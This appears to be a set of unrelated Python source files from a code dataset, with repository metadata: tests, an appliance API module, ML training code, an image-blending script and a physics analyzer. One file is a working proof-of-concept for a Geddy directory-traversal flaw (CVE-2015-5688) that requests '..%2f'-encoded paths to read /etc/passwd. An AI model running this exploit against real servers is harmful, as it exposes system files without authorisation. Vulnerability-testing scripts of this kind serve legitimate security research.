test/test_utils/test_statistical_tests.py
automl/SpySMAC
afcbecd0b9cb97276625c16a89cb6df141e6f6f2
[ "BSD-3-Clause" ]
17
2018-03-17T04:46:09.000Z
2021-02-18T18:31:38.000Z
import logging import unittest import numpy as np from cave.utils.statistical_tests import paired_permutation, paired_t_student class TestStatisticalTests(unittest.TestCase): def setUp(self): self.logger = logging.getLogger("TestStatisticalTests") def test_paired_permutation(self): """ Testing paired permutation test. """ rng = np.random.RandomState(42) a, b = rng.normal(loc=0, size=100), rng.normal(loc=0, size=100) result = paired_permutation(a, a, rng, 100, self.logger) self.assertGreater(result, 0.9999) result = paired_permutation(a, b, rng, 100, self.logger) self.assertGreater(result, 0.3) a, b = rng.normal(loc=-1, size=100), rng.normal(loc=1, size=100) result = paired_permutation(a, b, rng, 1000, self.logger) self.assertLess(result, 0.001) def test_t_student(self): """ Testing paired t-test. """ rng = np.random.RandomState(42) a, b = rng.normal(loc=0, size=100), rng.normal(loc=0, size=100) result = paired_t_student(a, b, self.logger) self.assertGreater(result, 0.3) a, b = rng.normal(loc=-1, size=100), rng.normal(loc=1, size=100) result = paired_t_student(a, b, self.logger) self.assertLess(result, 0.001)
37.057143
77
0.651503
import logging import unittest import numpy as np from cave.utils.statistical_tests import paired_permutation, paired_t_student class TestStatisticalTests(unittest.TestCase): def setUp(self): self.logger = logging.getLogger("TestStatisticalTests") def test_paired_permutation(self): rng = np.random.RandomState(42) a, b = rng.normal(loc=0, size=100), rng.normal(loc=0, size=100) result = paired_permutation(a, a, rng, 100, self.logger) self.assertGreater(result, 0.9999) result = paired_permutation(a, b, rng, 100, self.logger) self.assertGreater(result, 0.3) a, b = rng.normal(loc=-1, size=100), rng.normal(loc=1, size=100) result = paired_permutation(a, b, rng, 1000, self.logger) self.assertLess(result, 0.001) def test_t_student(self): rng = np.random.RandomState(42) a, b = rng.normal(loc=0, size=100), rng.normal(loc=0, size=100) result = paired_t_student(a, b, self.logger) self.assertGreater(result, 0.3) a, b = rng.normal(loc=-1, size=100), rng.normal(loc=1, size=100) result = paired_t_student(a, b, self.logger) self.assertLess(result, 0.001)
true
true
f705c09c479088d7f96725e5df722801a0715965
5,653
py
Python
ibmsecurity/isam/base/network/felb/services/servers.py
ibm-enio/ibmsecurity
81f989678642c3b6a49b2a3fbb5d9ca98804ef17
[ "Apache-2.0" ]
2
2019-12-05T13:51:10.000Z
2019-12-20T08:02:35.000Z
ibmsecurity/isam/base/network/felb/services/servers.py
ibm-enio/ibmsecurity
81f989678642c3b6a49b2a3fbb5d9ca98804ef17
[ "Apache-2.0" ]
null
null
null
ibmsecurity/isam/base/network/felb/services/servers.py
ibm-enio/ibmsecurity
81f989678642c3b6a49b2a3fbb5d9ca98804ef17
[ "Apache-2.0" ]
1
2020-04-03T09:30:01.000Z
2020-04-03T09:30:01.000Z
import ibmsecurity.utilities.tools import logging logger = logging.getLogger(__name__) module_uri = "/isam/felb/configuration/services/" requires_modulers = None requires_version = None def add(isamAppliance, service_name, address, active, port, weight, secure, ssllabel, check_mode=False, force=False): """ Creating a server """ change_required = _check_exist(isamAppliance, service_name, address, port=port) if force is True or change_required is True: if check_mode is True: return isamAppliance.create_return_object(changed=True) else: return isamAppliance.invoke_post("Creating a server", "{0}{1}/servers".format(module_uri, service_name, address), { "active": active, "address": address, "port": port, "weight": weight, "secure": secure, "ssllabel": ssllabel }, requires_version=requires_version, requires_modules=requires_modulers) else: return isamAppliance.create_return_object() def delete(isamAppliance, service_name, address, check_mode=False, force=False): """ deletes a server from specified service name """ if force is True or _check_exist(isamAppliance, service_name, address) is True: if check_mode is True: return isamAppliance.create_return_object(changed=True) else: return isamAppliance.invoke_delete("Deleting a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address), requires_version=requires_version, requires_modules=requires_modulers) else: return isamAppliance.create_return_object() def get(isamAppliance, service_name, address, check_mode=False, force=False): """ Retrieves server from specified service name """ return ( isamAppliance.invoke_get("Retrieving a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address), requires_version=requires_version, requires_modules=requires_modulers)) def get_all(isamAppliance, service_name, check_mode=False, force=False): """ Retrieves a list of servers under a specified service """ return isamAppliance.invoke_get("Retrieving servers for a service", "{0}{1}/servers".format(module_uri, service_name), requires_version=requires_version, requires_modules=requires_modulers) def update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False, ssllabel=None, check_mode=False, force=False): """ Updating server """ change_required = _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure, ssllabel) if force is True or change_required is True: if check_mode is True: return isamAppliance.create_return_object(changed=True) else: return isamAppliance.invoke_put("Updating a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address), { "address": new_address, "active": active, "port": new_port, "weight": weight, "secure": secure, "ssllabel": ssllabel }, requires_modules=requires_modulers, requires_version=requires_version) else: return isamAppliance.create_return_object() def _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False, ssllabel=None): """ idempontency test """ org_obj = get(isamAppliance, service_name, address) if org_obj['data']['address'] != new_address: return True elif org_obj['data']['active'] != active: return True elif org_obj['data']['port'] != new_port: return True elif org_obj['data']['weight'] != weight: return True elif org_obj['data']['secure'] != secure: return True elif org_obj['data']['ssllabel'] != ssllabel: return True else: return False def _check_exist(isamAppliance, service_name, address): """ idempotency test for delete function """ check_obj = {} # Check weather the address with corresponding server exists try: check_obj = get(isamAppliance, service_name, address) except: return False return True def compare(isamAppliance1, isamAppliance2): """ Compare cluster configuration between two appliances """ ret_obj1 = get(isamAppliance1) ret_obj2 = get(isamAppliance2) return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
38.195946
120
0.552096
import ibmsecurity.utilities.tools import logging logger = logging.getLogger(__name__) module_uri = "/isam/felb/configuration/services/" requires_modulers = None requires_version = None def add(isamAppliance, service_name, address, active, port, weight, secure, ssllabel, check_mode=False, force=False): change_required = _check_exist(isamAppliance, service_name, address, port=port) if force is True or change_required is True: if check_mode is True: return isamAppliance.create_return_object(changed=True) else: return isamAppliance.invoke_post("Creating a server", "{0}{1}/servers".format(module_uri, service_name, address), { "active": active, "address": address, "port": port, "weight": weight, "secure": secure, "ssllabel": ssllabel }, requires_version=requires_version, requires_modules=requires_modulers) else: return isamAppliance.create_return_object() def delete(isamAppliance, service_name, address, check_mode=False, force=False): if force is True or _check_exist(isamAppliance, service_name, address) is True: if check_mode is True: return isamAppliance.create_return_object(changed=True) else: return isamAppliance.invoke_delete("Deleting a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address), requires_version=requires_version, requires_modules=requires_modulers) else: return isamAppliance.create_return_object() def get(isamAppliance, service_name, address, check_mode=False, force=False): return ( isamAppliance.invoke_get("Retrieving a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address), requires_version=requires_version, requires_modules=requires_modulers)) def get_all(isamAppliance, service_name, check_mode=False, force=False): return isamAppliance.invoke_get("Retrieving servers for a service", "{0}{1}/servers".format(module_uri, service_name), requires_version=requires_version, requires_modules=requires_modulers) def update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False, ssllabel=None, check_mode=False, force=False): change_required = _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure, ssllabel) if force is True or change_required is True: if check_mode is True: return isamAppliance.create_return_object(changed=True) else: return isamAppliance.invoke_put("Updating a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address), { "address": new_address, "active": active, "port": new_port, "weight": weight, "secure": secure, "ssllabel": ssllabel }, requires_modules=requires_modulers, requires_version=requires_version) else: return isamAppliance.create_return_object() def _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False, ssllabel=None): org_obj = get(isamAppliance, service_name, address) if org_obj['data']['address'] != new_address: return True elif org_obj['data']['active'] != active: return True elif org_obj['data']['port'] != new_port: return True elif org_obj['data']['weight'] != weight: return True elif org_obj['data']['secure'] != secure: return True elif org_obj['data']['ssllabel'] != ssllabel: return True else: return False def _check_exist(isamAppliance, service_name, address): check_obj = {} try: check_obj = get(isamAppliance, service_name, address) except: return False return True def compare(isamAppliance1, isamAppliance2): ret_obj1 = get(isamAppliance1) ret_obj2 = get(isamAppliance2) return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
true
true
f705c13bef4357c4b974d68a76c4f8617f700d7c
1,417
py
Python
tensorflow_probability/python/version.py
bolcom/probability
4a11efad1ecd8a1336e4c9fdb0105efbf2375ad7
[ "Apache-2.0" ]
1
2019-10-10T06:15:42.000Z
2019-10-10T06:15:42.000Z
tensorflow_probability/python/version.py
bolcom/probability
4a11efad1ecd8a1336e4c9fdb0105efbf2375ad7
[ "Apache-2.0" ]
null
null
null
tensorflow_probability/python/version.py
bolcom/probability
4a11efad1ecd8a1336e4c9fdb0105efbf2375ad7
[ "Apache-2.0" ]
1
2020-05-27T19:42:06.000Z
2020-05-27T19:42:06.000Z
# Copyright 2018 The TensorFlow Probability Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Define TensorFlow Probability version information.""" # We follow Semantic Versioning (https://semver.org/) _MAJOR_VERSION = '0' _MINOR_VERSION = '9' _PATCH_VERSION = '0' # When building releases, we can update this value on the release branch to # reflect the current release candidate ('rc0', 'rc1') or, finally, the official # stable release (indicated by `_VERSION_SUFFIX = ''`). Outside the context of a # release branch, the current version is by default assumed to be a # 'development' version, labeled 'dev'. _VERSION_SUFFIX = 'dev' # Example, '0.4.0-dev' __version__ = '.'.join([ _MAJOR_VERSION, _MINOR_VERSION, _PATCH_VERSION, ]) if _VERSION_SUFFIX: __version__ = '{}-{}'.format(__version__, _VERSION_SUFFIX)
38.297297
80
0.703599
_MAJOR_VERSION = '0' _MINOR_VERSION = '9' _PATCH_VERSION = '0' _VERSION_SUFFIX = 'dev' __version__ = '.'.join([ _MAJOR_VERSION, _MINOR_VERSION, _PATCH_VERSION, ]) if _VERSION_SUFFIX: __version__ = '{}-{}'.format(__version__, _VERSION_SUFFIX)
true
true
f705c143029f1b8fb5a082a334e82961e60babb9
3,371
py
Python
model_zoo/mnist/mnist_functional_api.py
zuston/elasticdl
601609fd44f826a2f5ea209443124b2c9a2f9ccb
[ "MIT" ]
null
null
null
model_zoo/mnist/mnist_functional_api.py
zuston/elasticdl
601609fd44f826a2f5ea209443124b2c9a2f9ccb
[ "MIT" ]
null
null
null
model_zoo/mnist/mnist_functional_api.py
zuston/elasticdl
601609fd44f826a2f5ea209443124b2c9a2f9ccb
[ "MIT" ]
null
null
null
# Copyright 2020 The ElasticDL Authors. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import numpy as np import PIL.Image import tensorflow as tf from elasticdl.python.common.constants import Mode def custom_model(): inputs = tf.keras.Input(shape=(28, 28), name="image") x = tf.keras.layers.Reshape((28, 28, 1))(inputs) x = tf.keras.layers.Conv2D(32, kernel_size=(3, 3), activation="relu")(x) x = tf.keras.layers.Conv2D(64, kernel_size=(3, 3), activation="relu")(x) x = tf.keras.layers.BatchNormalization()(x) x = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(x) x = tf.keras.layers.Dropout(0.25)(x) x = tf.keras.layers.Flatten()(x) outputs = tf.keras.layers.Dense(10)(x) return tf.keras.Model(inputs=inputs, outputs=outputs, name="mnist_model") def prepare_data_for_a_single_file(file_object, filename): """ :param filename: training data file name :param file_object: a file object associated with filename """ label = int(filename.split("/")[-2]) image = PIL.Image.open(file_object) numpy_image = np.array(image) example_dict = { "image": tf.train.Feature( float_list=tf.train.FloatList(value=numpy_image.flatten()) ), "label": tf.train.Feature( int64_list=tf.train.Int64List(value=[label]) ), } example = tf.train.Example( features=tf.train.Features(feature=example_dict) ) return example.SerializeToString() def loss(labels, predictions): labels = tf.reshape(labels, [-1]) return tf.reduce_mean( input_tensor=tf.nn.sparse_softmax_cross_entropy_with_logits( logits=predictions, labels=labels ) ) def optimizer(lr=0.01): return tf.optimizers.SGD(lr) def feed(dataset, mode, _): def _parse_data(record): if mode == Mode.PREDICTION: feature_description = { "image": tf.io.FixedLenFeature([28, 28], tf.float32) } else: feature_description = { "image": tf.io.FixedLenFeature([28, 28], tf.float32), "label": tf.io.FixedLenFeature([1], tf.int64), } r = tf.io.parse_single_example(record, feature_description) features = { "image": tf.math.divide(tf.cast(r["image"], tf.float32), 255.0) } if mode == Mode.PREDICTION: return features else: return features, tf.cast(r["label"], tf.int32) dataset = dataset.map(_parse_data) if mode == Mode.TRAINING: dataset = dataset.shuffle(buffer_size=1024) return dataset def eval_metrics_fn(): return { "accuracy": lambda labels, predictions: tf.equal( tf.argmax(predictions, 1, output_type=tf.int32), tf.cast(tf.reshape(labels, [-1]), tf.int32), ) }
32.413462
77
0.644616
import numpy as np import PIL.Image import tensorflow as tf from elasticdl.python.common.constants import Mode def custom_model(): inputs = tf.keras.Input(shape=(28, 28), name="image") x = tf.keras.layers.Reshape((28, 28, 1))(inputs) x = tf.keras.layers.Conv2D(32, kernel_size=(3, 3), activation="relu")(x) x = tf.keras.layers.Conv2D(64, kernel_size=(3, 3), activation="relu")(x) x = tf.keras.layers.BatchNormalization()(x) x = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(x) x = tf.keras.layers.Dropout(0.25)(x) x = tf.keras.layers.Flatten()(x) outputs = tf.keras.layers.Dense(10)(x) return tf.keras.Model(inputs=inputs, outputs=outputs, name="mnist_model") def prepare_data_for_a_single_file(file_object, filename): label = int(filename.split("/")[-2]) image = PIL.Image.open(file_object) numpy_image = np.array(image) example_dict = { "image": tf.train.Feature( float_list=tf.train.FloatList(value=numpy_image.flatten()) ), "label": tf.train.Feature( int64_list=tf.train.Int64List(value=[label]) ), } example = tf.train.Example( features=tf.train.Features(feature=example_dict) ) return example.SerializeToString() def loss(labels, predictions): labels = tf.reshape(labels, [-1]) return tf.reduce_mean( input_tensor=tf.nn.sparse_softmax_cross_entropy_with_logits( logits=predictions, labels=labels ) ) def optimizer(lr=0.01): return tf.optimizers.SGD(lr) def feed(dataset, mode, _): def _parse_data(record): if mode == Mode.PREDICTION: feature_description = { "image": tf.io.FixedLenFeature([28, 28], tf.float32) } else: feature_description = { "image": tf.io.FixedLenFeature([28, 28], tf.float32), "label": tf.io.FixedLenFeature([1], tf.int64), } r = tf.io.parse_single_example(record, feature_description) features = { "image": tf.math.divide(tf.cast(r["image"], tf.float32), 255.0) } if mode == Mode.PREDICTION: return features else: return features, tf.cast(r["label"], tf.int32) dataset = dataset.map(_parse_data) if mode == Mode.TRAINING: dataset = dataset.shuffle(buffer_size=1024) return dataset def eval_metrics_fn(): return { "accuracy": lambda labels, predictions: tf.equal( tf.argmax(predictions, 1, output_type=tf.int32), tf.cast(tf.reshape(labels, [-1]), tf.int32), ) }
true
true
f705c37d2339c79f6a9a632cefaf65a79808d37d
1,720
py
Python
2015/CVE-2015-5688/poc/pocsploit/CVE-2015-5688.py
hjyuan/reapoc
ef515e56c44c2590ff8601582bf6c08e076e7083
[ "Apache-2.0" ]
421
2021-12-07T08:46:40.000Z
2022-03-31T12:42:16.000Z
2015/CVE-2015-5688/poc/pocsploit/CVE-2015-5688.py
hjyuan/reapoc
ef515e56c44c2590ff8601582bf6c08e076e7083
[ "Apache-2.0" ]
5
2022-03-27T07:37:32.000Z
2022-03-31T13:56:11.000Z
2015/CVE-2015-5688/poc/pocsploit/CVE-2015-5688.py
hjyuan/reapoc
ef515e56c44c2590ff8601582bf6c08e076e7083
[ "Apache-2.0" ]
144
2021-12-07T11:06:14.000Z
2022-03-31T07:41:35.000Z
import requests # Vuln Base Info def info(): return { "author": "cckuailong", "name": '''Geddy before v13.0.8 LFI''', "description": '''Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.''', "severity": "high", "references": [ "https://nodesecurity.io/advisories/geddy-directory-traversal", "https://github.com/geddy/geddy/issues/697" ], "classification": { "cvss-metrics": "", "cvss-score": "", "cve-id": "", "cwe-id": "" }, "metadata":{ "vuln-target": "", }, "tags": ["cve", "cve2015", "geddy", "lfi"], } # Vender Fingerprint def fingerprint(url): return True # Proof of Concept def poc(url): result = {} try: url = format_url(url) path = '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) if resp.status_code == 200 and "root:" in resp.text: result["success"] = True result["info"] = info() result["payload"] = url+path except: result["success"] = False return result # Exploit, can be same with poc() def exp(url): return poc(url) # Utils def format_url(url): url = url.strip() if not ( url.startswith('http://') or url.startswith('https://') ): url = 'http://' + url url = url.rstrip('/') return url
26.875
239
0.533721
import requests def info(): return { "author": "cckuailong", "name": '''Geddy before v13.0.8 LFI''', "description": '''Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.''', "severity": "high", "references": [ "https://nodesecurity.io/advisories/geddy-directory-traversal", "https://github.com/geddy/geddy/issues/697" ], "classification": { "cvss-metrics": "", "cvss-score": "", "cve-id": "", "cwe-id": "" }, "metadata":{ "vuln-target": "", }, "tags": ["cve", "cve2015", "geddy", "lfi"], } def fingerprint(url): return True def poc(url): result = {} try: url = format_url(url) path = '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) if resp.status_code == 200 and "root:" in resp.text: result["success"] = True result["info"] = info() result["payload"] = url+path except: result["success"] = False return result def exp(url): return poc(url) def format_url(url): url = url.strip() if not ( url.startswith('http://') or url.startswith('https://') ): url = 'http://' + url url = url.rstrip('/') return url
true
true
f705c380c38b745a99107f2f972df3893011b4c5
64
py
Python
Factorial digit sum/main.py
Skogrine/ProjectEuler
40e104ac91852dec66b5b7938d6553d1bbdc590f
[ "Apache-2.0" ]
null
null
null
Factorial digit sum/main.py
Skogrine/ProjectEuler
40e104ac91852dec66b5b7938d6553d1bbdc590f
[ "Apache-2.0" ]
null
null
null
Factorial digit sum/main.py
Skogrine/ProjectEuler
40e104ac91852dec66b5b7938d6553d1bbdc590f
[ "Apache-2.0" ]
null
null
null
import math n = 100 print(sum(map(int, str(math.factorial(n)))))
21.333333
44
0.703125
import math n = 100 print(sum(map(int, str(math.factorial(n)))))
true
true
f705c4e287fb6d6f6989f47abb2afa301f8bd782
2,415
py
Python
blend.py
andrewdownie/BlendAway
daf73b22c29dfa905fbe8e838188d4df5861ae5d
[ "MIT" ]
null
null
null
blend.py
andrewdownie/BlendAway
daf73b22c29dfa905fbe8e838188d4df5861ae5d
[ "MIT" ]
null
null
null
blend.py
andrewdownie/BlendAway
daf73b22c29dfa905fbe8e838188d4df5861ae5d
[ "MIT" ]
null
null
null
import os import sys import numpy as np import cv2 import statistics import datetime def getMedian(arr, x, y): values = [] for a in arr: values.append(a[x][y]) return statistics.median_grouped(values) def getMean(arr, x, y): values = [] for a in arr: values.append(a[x][y]) return statistics.mean(values) def getMode(arr, x, y): values = [] for a in arr: values.append(a[x][y]) try: mode = statistics.mode(values) return mode except statistics.StatisticsError: # all values are the same return getMedian(arr,x,y) method = sys.argv[1] imgs = ["1.png","2.png", "3.png", "4.png", "5.png"] # image #direct = os.getcwd() + "/images/" # where to get test images #saved = os.getcwd() + "/saved/" # where to get test images direct = "/var/www/html/" # where to get test images saved = "/var/www/html/" # where to get test images i=0 images = [] for img in imgs: image = cv2.imread(direct + img) # open template image images.append(image) (height, width) = image.shape[:2] # get dimensions red = [] green = [] blue = [] for image in images: redMatrix = [[0 for x in range(width)] for y in range(height)] greenMatrix = [[0 for x in range(width)] for y in range(height)] blueMatrix = [[0 for x in range(width)] for y in range(height)] for x in range(height): for y in range(width): redMatrix[x][y] = image[x,y,0] greenMatrix[x][y] = image[x,y,1] blueMatrix[x][y] = image[x,y,2] red.append(redMatrix) green.append(greenMatrix) blue.append(blueMatrix) newImage = np.zeros((height,width,3), np.uint8) for x in range(height): for y in range(width): rgb = [] if(method == "median"): redMedian = getMedian(red,x,y) greenMedian = getMedian(green,x,y) blueMedian = getMedian(blue,x,y) if(method == "mean"): redMedian = getMean(red,x,y) greenMedian = getMean(green,x,y) blueMedian = getMean(blue,x,y) if(method == "mode"): redMedian = getMode(red,x,y) greenMedian = getMode(green,x,y) blueMedian = getMode(blue,x,y) rgb.append(redMedian) rgb.append(greenMedian) rgb.append(blueMedian) newImage[x][y] = rgb cv2.imwrite(saved + "results.jpg", newImage) # save image
25.15625
68
0.59089
import os import sys import numpy as np import cv2 import statistics import datetime def getMedian(arr, x, y): values = [] for a in arr: values.append(a[x][y]) return statistics.median_grouped(values) def getMean(arr, x, y): values = [] for a in arr: values.append(a[x][y]) return statistics.mean(values) def getMode(arr, x, y): values = [] for a in arr: values.append(a[x][y]) try: mode = statistics.mode(values) return mode except statistics.StatisticsError: return getMedian(arr,x,y) method = sys.argv[1] imgs = ["1.png","2.png", "3.png", "4.png", "5.png"] " i=0 images = [] for img in imgs: image = cv2.imread(direct + img) images.append(image) (height, width) = image.shape[:2] red = [] green = [] blue = [] for image in images: redMatrix = [[0 for x in range(width)] for y in range(height)] greenMatrix = [[0 for x in range(width)] for y in range(height)] blueMatrix = [[0 for x in range(width)] for y in range(height)] for x in range(height): for y in range(width): redMatrix[x][y] = image[x,y,0] greenMatrix[x][y] = image[x,y,1] blueMatrix[x][y] = image[x,y,2] red.append(redMatrix) green.append(greenMatrix) blue.append(blueMatrix) newImage = np.zeros((height,width,3), np.uint8) for x in range(height): for y in range(width): rgb = [] if(method == "median"): redMedian = getMedian(red,x,y) greenMedian = getMedian(green,x,y) blueMedian = getMedian(blue,x,y) if(method == "mean"): redMedian = getMean(red,x,y) greenMedian = getMean(green,x,y) blueMedian = getMean(blue,x,y) if(method == "mode"): redMedian = getMode(red,x,y) greenMedian = getMode(green,x,y) blueMedian = getMode(blue,x,y) rgb.append(redMedian) rgb.append(greenMedian) rgb.append(blueMedian) newImage[x][y] = rgb cv2.imwrite(saved + "results.jpg", newImage)
true
true
f705c4fc494cdf40b01b01fb964de724d9ee0942
1,205
py
Python
AccessKeysInDictionary.py
Snehasis124/PythonTutorials
133060cd4f2126dbc427a724b831834e90c26fdc
[ "Apache-2.0" ]
null
null
null
AccessKeysInDictionary.py
Snehasis124/PythonTutorials
133060cd4f2126dbc427a724b831834e90c26fdc
[ "Apache-2.0" ]
null
null
null
AccessKeysInDictionary.py
Snehasis124/PythonTutorials
133060cd4f2126dbc427a724b831834e90c26fdc
[ "Apache-2.0" ]
null
null
null
#9TH PROGRAM # THIS PROGRAM WILL HELP IN ACCESSING DICTIONARY ITEMS AND PERFROM CERTAIN OPERATIONS WITH DICTIONARY ages = {} #EMPTY DICTIONARY ages["Micky"] = 24 ages["Lucky"] = 25 print(ages) keys = ages.keys # .keys prints all the keys avaialble in Dictionary print(keys) values = ages.values # .values prints all the values avaialble in Dictionary print(values) print(sorted(ages)) # NOTE Unable to sort print(sorted(ages.values)) print(ages.values) # Prints the values # NOTE has_key() has been replaced by "in" in Python 3 , You can access like below. # Syntax : "Values" in "dict" if("Micky" in ages): print("Micky is there") else: print("Micky is not there") print(len(ages)) # Print the length of the dictionary #Adding new item # New initialization ages = {"Snehasis" : "24" , "Sradhasis" : 25} print(ages) # New members ages["LKP"] = 45 # Here value is saved as int if("LKP" in ages): updatedValue = ages.get("LKP") + 10 print("Updated Value = " , updatedValue) print(ages) ages["JYOTI"] = "38" # Here value is saved as string if("JYOTI" in ages): updatedValue = ages.get("JYOTI") + " New Age" print("Updated Value = " , updatedValue) print(ages)
23.173077
101
0.687137
ages = {} ages["Micky"] = 24 ages["Lucky"] = 25 print(ages) keys = ages.keys print(keys) values = ages.values print(values) print(sorted(ages)) print(ages.values) if("Micky" in ages): print("Micky is there") else: print("Micky is not there") print(len(ages)) ages = {"Snehasis" : "24" , "Sradhasis" : 25} print(ages) ages["LKP"] = 45 if("LKP" in ages): updatedValue = ages.get("LKP") + 10 print("Updated Value = " , updatedValue) print(ages) ages["JYOTI"] = "38" if("JYOTI" in ages): updatedValue = ages.get("JYOTI") + " New Age" print("Updated Value = " , updatedValue) print(ages)
true
true
f705c51665ca83673376bc29d03db188df991c5f
2,970
py
Python
PhysicsTools/Heppy/python/analyzers/core/SkimAnalyzerCount.py
ckamtsikis/cmssw
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
[ "Apache-2.0" ]
852
2015-01-11T21:03:51.000Z
2022-03-25T21:14:00.000Z
PhysicsTools/Heppy/python/analyzers/core/SkimAnalyzerCount.py
ckamtsikis/cmssw
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
[ "Apache-2.0" ]
30,371
2015-01-02T00:14:40.000Z
2022-03-31T23:26:05.000Z
PhysicsTools/Heppy/python/analyzers/core/SkimAnalyzerCount.py
ckamtsikis/cmssw
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
[ "Apache-2.0" ]
3,240
2015-01-02T05:53:18.000Z
2022-03-31T17:24:21.000Z
from __future__ import print_function import itertools from PhysicsTools.Heppy.analyzers.core.Analyzer import Analyzer from PhysicsTools.Heppy.analyzers.core.AutoHandle import AutoHandle from PhysicsTools.HeppyCore.framework.event import Event from PhysicsTools.HeppyCore.statistics.counter import Counter, Counters from DataFormats.FWLite import Events, Handle,Lumis class SkimAnalyzerCount( Analyzer ): #--------------------------------------------- # TO FINDS THE INITIAL EVENTS BEFORE THE SKIM #--------------------------------------------- def __init__(self, cfg_ana, cfg_comp, looperName): super(SkimAnalyzerCount, self).__init__(cfg_ana, cfg_comp, looperName) self.useLumiBlocks = self.cfg_ana.useLumiBlocks if (hasattr(self.cfg_ana,'useLumiBlocks')) else False self.verbose = getattr(self.cfg_ana, 'verbose', False) def declareHandles(self): super(SkimAnalyzerCount, self).declareHandles() self.counterHandle = Handle("edm::MergeableCounter") self.mchandles['GenInfo'] = AutoHandle( ('generator','',''), 'GenEventInfoProduct' ) def beginLoop(self, setup): super(SkimAnalyzerCount,self).beginLoop(setup) self.counters.addCounter('SkimReport') self.count = self.counters.counter('SkimReport') self.count.register('All Events') if self.cfg_comp.isMC: self.count.register('Sum Weights') if not self.useLumiBlocks: #print 'Will actually count events instead of accessing lumi blocks' return True print('Counting the total events before the skim by accessing luminosity blocks') lumis = Lumis(self.cfg_comp.files) totalEvents=0 for lumi in lumis: if lumi.getByLabel('prePathCounter',self.counterHandle): totalEvents+=self.counterHandle.product().value else: self.useLumiBlocks = False break if self.useLumiBlocks: self.count.inc('All Events',totalEvents) if self.cfg_comp.isMC: self.count.inc('Sum Weights',totalEvents) print('Done -> proceeding with the analysis') else: print('Failed -> will have to actually count events (this can happen if the input dataset is not a CMG one)') def process(self, event): if self.verbose: print("\nProcessing run:lumi:event %d:%d:%d" % ( event.input.eventAuxiliary().id().run(), event.input.eventAuxiliary().id().luminosityBlock(), event.input.eventAuxiliary().id().event())) if not self.useLumiBlocks: self.readCollections( event.input ) self.count.inc('All Events') if self.cfg_comp.isMC: self.count.inc('Sum Weights', self.mchandles['GenInfo'].product().weight()) return True
40.684932
121
0.619865
from __future__ import print_function import itertools from PhysicsTools.Heppy.analyzers.core.Analyzer import Analyzer from PhysicsTools.Heppy.analyzers.core.AutoHandle import AutoHandle from PhysicsTools.HeppyCore.framework.event import Event from PhysicsTools.HeppyCore.statistics.counter import Counter, Counters from DataFormats.FWLite import Events, Handle,Lumis class SkimAnalyzerCount( Analyzer ): def __init__(self, cfg_ana, cfg_comp, looperName): super(SkimAnalyzerCount, self).__init__(cfg_ana, cfg_comp, looperName) self.useLumiBlocks = self.cfg_ana.useLumiBlocks if (hasattr(self.cfg_ana,'useLumiBlocks')) else False self.verbose = getattr(self.cfg_ana, 'verbose', False) def declareHandles(self): super(SkimAnalyzerCount, self).declareHandles() self.counterHandle = Handle("edm::MergeableCounter") self.mchandles['GenInfo'] = AutoHandle( ('generator','',''), 'GenEventInfoProduct' ) def beginLoop(self, setup): super(SkimAnalyzerCount,self).beginLoop(setup) self.counters.addCounter('SkimReport') self.count = self.counters.counter('SkimReport') self.count.register('All Events') if self.cfg_comp.isMC: self.count.register('Sum Weights') if not self.useLumiBlocks: return True print('Counting the total events before the skim by accessing luminosity blocks') lumis = Lumis(self.cfg_comp.files) totalEvents=0 for lumi in lumis: if lumi.getByLabel('prePathCounter',self.counterHandle): totalEvents+=self.counterHandle.product().value else: self.useLumiBlocks = False break if self.useLumiBlocks: self.count.inc('All Events',totalEvents) if self.cfg_comp.isMC: self.count.inc('Sum Weights',totalEvents) print('Done -> proceeding with the analysis') else: print('Failed -> will have to actually count events (this can happen if the input dataset is not a CMG one)') def process(self, event): if self.verbose: print("\nProcessing run:lumi:event %d:%d:%d" % ( event.input.eventAuxiliary().id().run(), event.input.eventAuxiliary().id().luminosityBlock(), event.input.eventAuxiliary().id().event())) if not self.useLumiBlocks: self.readCollections( event.input ) self.count.inc('All Events') if self.cfg_comp.isMC: 